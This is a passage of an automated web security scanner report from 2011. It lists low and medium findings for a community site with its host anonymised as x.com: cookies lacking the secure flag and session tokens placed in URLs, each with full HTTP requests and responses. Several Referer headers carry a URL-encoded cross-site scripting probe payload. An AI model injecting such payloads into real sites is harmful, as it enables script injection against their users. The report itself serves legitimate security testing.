Set-Cookie: jive.recentHistory.-1=31342c323036333b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:42 GMT; Path=/
Vary: User-Agent
JP: D=161006 t=1313157162705096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.215. https://www.x.com/people/pluto26

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/pluto26

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/pluto26 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:40 GMT; Path=/
Vary: User-Agent
JP: D=76607 t=1313157160904760
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.216. https://www.x.com/people/posiden5665

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/posiden5665

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/posiden5665 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=81038 t=1313157130321120
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.217. https://www.x.com/people/ramonmorales123

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ramonmorales123

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/ramonmorales123 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=87382 t=1313157130920019
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.218. https://www.x.com/people/rizkygarut

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/rizkygarut

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/rizkygarut HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78953 t=1313157110910504
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.219. https://www.x.com/people/roguereptile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/roguereptile

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/roguereptile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=134822 t=1313157130043079
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.220. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b332c3131313737343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:33 GMT; Path=/
Vary: User-Agent
JP: D=72931 t=1313157153516546
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.221. https://www.x.com/people/sebastian.kopp@wooga.com

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/sebastian.kopp@wooga.com

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/sebastian.kopp@wooga.com HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:03 GMT; Path=/
Vary: User-Agent
JP: D=79810 t=1313157123276448
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.222. https://www.x.com/people/skier

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/skier

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/skier HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=93161 t=1313157133808445
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

3. Session token in URL
There are 56 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. https://www.x.com/images/transparent.png

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /images/transparent.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/transparent.png;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:19 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:40:21 GMT
Cache-Control: max-age=60
Content-Type: image/png
Vary: Accept-Encoding,User-Agent
JP: D=703 t=1313157139457601
Content-Length: 100
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


3.2. https://www.x.com/index.jspa

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /index.jspa

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /index.jspa HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
JP: D=81298 t=1313114364510678
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 33122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</a> or <a href="https://www.x.com/login.jspa;jsessionid=C5B183263B3F02ED7C066088CE4D527D.node0?flowType=Signup">Register</a>
...[SNIP]...

3.3. https://www.x.com/login.jspa

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /login.jspa

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /login.jspa;jsessionid=C5B183263B3F02ED7C066088CE4D527D.node0?flowType=Signup HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Fri, 12 Aug 2011 13:53:45 GMT
Server: Apache-Coyote/1.1
Location: https://www.paypal.com/cgi-bin/webscr?cmd=_account-authenticate-login&RequestFromPortal=true&token=HA-DD2JDQKXPXNFG
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Vary: User-Agent
JP: D=7156 t=1313157225523734
Cache-Control: no-cache, private
Connection: close


3.4. https://www.x.com/people/Bill_at_Repaid.com/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Bill_at_Repaid.com/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Bill_at_Repaid.com/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9807 t=1313157144371655
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.5. https://www.x.com/people/DaveLeWave/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/DaveLeWave/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/DaveLeWave/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=6964 t=1313157136764283
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.6. https://www.x.com/people/Jareth_2005/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Jareth_2005/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Jareth_2005/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=10461 t=1313157137312841
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.7. https://www.x.com/people/Maxatnes/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Maxatnes/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Maxatnes/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7800 t=1313157136922093
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.8. https://www.x.com/people/Murugesh_cit/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/Murugesh_cit/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/Murugesh_cit/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9205 t=1313157136915496
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.9. https://www.x.com/people/NetGuy/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/NetGuy/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/NetGuy/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:05 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=14657 t=1313158266056768
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.10. https://www.x.com/people/PP_MTS_Chad/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/PP_MTS_Chad/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1249 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:05 GMT
Server: Apache-Coyote/1.1
Last-Modified: Tue, 02 Mar 2010 21:30:22 GMT
Etag: "1249"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8308 t=1313158266078257
Keep-Alive: timeout=5, max=55
Connection: Keep-Alive
Content-Length: 6035

...[SNIP]...

3.11. https://www.x.com/people/PP_MTS_Magarvin/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/PP_MTS_Magarvin/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1014 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:04 GMT
Server: Apache-Coyote/1.1
Last-Modified: Wed, 28 Oct 2009 04:35:03 GMT
Etag: "1014"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8565 t=1313158264488096
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive
Content-Length: 3347

...[SNIP]...

3.12. https://www.x.com/people/Saveby/avatar

Summary

